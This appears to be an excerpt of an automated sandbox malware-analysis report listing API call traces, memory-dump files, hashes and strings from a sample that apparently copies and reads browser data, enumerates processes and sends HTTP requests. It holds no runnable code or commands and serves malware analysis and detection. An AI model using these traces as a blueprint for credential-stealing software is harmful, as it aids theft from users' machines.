                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(03554EB0,00000000,00000000,?,030212D8,?,03010153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,03020AFE), ref: 0300A132
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0300A0B2, 0300A0C6, 0300A0DC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                • API String ID: 2929475105-1843082770
                                                                                                                                                                • Opcode ID: 60a2e8f4c8c0aec4b34a93e312f2808891553f9e47cd36883e7aa453de849ed1
                                                                                                                                                                • Instruction ID: bb4fbae64f6ea1aac58921ca0672131b2a958d4a5e877e55b4bcb622372f2ad6
                                                                                                                                                                • Opcode Fuzzy Hash: 60a2e8f4c8c0aec4b34a93e312f2808891553f9e47cd36883e7aa453de849ed1
                                                                                                                                                                • Instruction Fuzzy Hash: 454140B9A43204AFDF05FFA4F948BEE77B4BB49301F048129E50697284EB749995CB60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 03018B60: GetSystemTime.KERNEL32(?,03549910,030205AE,?,?,?,?,?,?,?,?,?,03004963,?,00000014), ref: 03018B86
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0300A2E1
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000), ref: 0300A3FF
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300A6BC
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 03009E10: memcmp.MSVCRT(?,v20,00000003), ref: 03009E2D
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0300A743
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 257331557-0
                                                                                                                                                                • Opcode ID: 29d31d6b2c3dbf6f9633949e0a15c89f3580bf23d6574a094efa69fa015c7660
                                                                                                                                                                • Instruction ID: dcd5d8b1b533c8e20d26d770f180753fcf492dfe11cfa5cd86f635fc3130bc57
                                                                                                                                                                • Opcode Fuzzy Hash: 29d31d6b2c3dbf6f9633949e0a15c89f3580bf23d6574a094efa69fa015c7660
                                                                                                                                                                • Instruction Fuzzy Hash: B2E1337AA132089BDB05FBA4DD94EEE733CAF94210F508159E5177A090EF706A5ECB70
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 03018B60: GetSystemTime.KERNEL32(?,03549910,030205AE,?,?,?,?,?,?,?,?,?,03004963,?,00000014), ref: 03018B86
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0300D801
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300D99F
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300D9B3
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0300DA32
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 211194620-0
                                                                                                                                                                • Opcode ID: 9f128eea1f859bf42b478f8d627bdeb72dc159bef310eafda759329e8fd70703
                                                                                                                                                                • Instruction ID: fbe93be3b6652a197a8bd9fcc99546e209cec3aeab08688c449629cdc520020c
                                                                                                                                                                • Opcode Fuzzy Hash: 9f128eea1f859bf42b478f8d627bdeb72dc159bef310eafda759329e8fd70703
                                                                                                                                                                • Instruction Fuzzy Hash: DE81247AA532089BDB04FBA4DD94DEE733CAF94210F504129F507AA090EF746A1ECB70
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 030099EC
                                                                                                                                                                  • Part of subcall function 030099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03009A11
                                                                                                                                                                  • Part of subcall function 030099C0: LocalAlloc.KERNEL32(00000040,?), ref: 03009A31
                                                                                                                                                                  • Part of subcall function 030099C0: ReadFile.KERNEL32(000000FF,?,00000000,030102E7,00000000), ref: 03009A5A
                                                                                                                                                                  • Part of subcall function 030099C0: LocalFree.KERNEL32(030102E7), ref: 03009A90
                                                                                                                                                                  • Part of subcall function 030099C0: CloseHandle.KERNEL32(000000FF), ref: 03009A9A
                                                                                                                                                                  • Part of subcall function 03018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 03018E52
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,03021580,03020D92), ref: 0300F54C
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300F56B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                • API String ID: 998311485-3310892237
                                                                                                                                                                • Opcode ID: 74a270b1c67db52d1b5233b1346a7bec20f6b1417e886851178cdd4ad41a3a9f
                                                                                                                                                                • Instruction ID: c4e0e26cea9cc719eed984427f42073ccb15c98b4a371c7481215008c044021c
                                                                                                                                                                • Opcode Fuzzy Hash: 74a270b1c67db52d1b5233b1346a7bec20f6b1417e886851178cdd4ad41a3a9f
                                                                                                                                                                • Instruction Fuzzy Hash: 8651247AE032089BDB04FBB0DD55DEE7778AF94210F408528E4166B190EF74671ECBA1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,030205B7), ref: 030186CA
                                                                                                                                                                • Process32First.KERNEL32(?,00000128), ref: 030186DE
                                                                                                                                                                • Process32Next.KERNEL32(?,00000128), ref: 030186F3
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 03018761
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1066202413-0
                                                                                                                                                                • Opcode ID: d46e82e8a8b263fcb84c4bbdc2eca0840060eb0e795f010c190ffcb58f83a81a
                                                                                                                                                                • Instruction ID: f4ba556a425da5481f0e85d2e9cf31cc99e14c8ae152c6d8af0530f58ea83546
                                                                                                                                                                • Opcode Fuzzy Hash: d46e82e8a8b263fcb84c4bbdc2eca0840060eb0e795f010c190ffcb58f83a81a
                                                                                                                                                                • Instruction Fuzzy Hash: 30316076A03218EBCB24EF54DD44FEEB778EF45710F008199E10AAA190DB706B55CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,03540578,?,0302110C,?,00000000,?,03021110,?,00000000,03020AEF), ref: 03016ACA
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03016AE8
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 03016AF9
                                                                                                                                                                • Sleep.KERNEL32(00001770), ref: 03016B04
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,03540578,?,0302110C,?,00000000,?,03021110,?,00000000,03020AEF), ref: 03016B1A
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 03016B22
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 941982115-0
                                                                                                                                                                • Opcode ID: e5f0ed5bebbb189d234b4b6c823b24bd9b1debc7a85ed89ae3b9caced1be251b
                                                                                                                                                                • Instruction ID: 04afc00531c8eae583732a2b434d14d46b976a320249d777cb692f4af190e4f5
                                                                                                                                                                • Opcode Fuzzy Hash: e5f0ed5bebbb189d234b4b6c823b24bd9b1debc7a85ed89ae3b9caced1be251b
                                                                                                                                                                • Instruction Fuzzy Hash: CAF05E38A8230DABE710FBA0EC59BBF7B74EB44741F408914F903A91C0CBB15550CA55
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 03006280: InternetOpenA.WININET(03020DFE,00000001,00000000,00000000,00000000), ref: 030062E1
                                                                                                                                                                  • Part of subcall function 03006280: StrCmpCA.SHLWAPI(?,03554CA0), ref: 03006303
                                                                                                                                                                  • Part of subcall function 03006280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03006335
                                                                                                                                                                  • Part of subcall function 03006280: HttpOpenRequestA.WININET(00000000,GET,?,03556390,00000000,00000000,00400100,00000000), ref: 03006385
                                                                                                                                                                  • Part of subcall function 03006280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 030063BF
                                                                                                                                                                  • Part of subcall function 03006280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 030063D1
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 03015228
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
